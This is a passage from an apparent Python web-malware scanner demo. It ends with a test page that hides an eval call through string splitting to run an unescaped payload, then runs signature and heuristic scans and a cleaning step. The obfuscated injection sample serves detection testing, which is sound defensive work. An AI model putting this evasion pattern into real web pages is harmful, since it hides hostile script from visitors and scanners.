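VARIANT_PAGE = (
    b"<html><body><script>var e = window['ev' + 'al']; "
    b"e(unescape('" + PAYLOAD + b"'));</script></body></html>"
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE), ("variant", VARIANT_PAGE)):
        print(name, "signatures:", scan(page), "heuristics:", heuristic(page))
    cleaned, removed = clean(INFECTED_PAGE)
    print("removed", len(removed), "spans; cleaned page still flagged:", scan(cleaned))
```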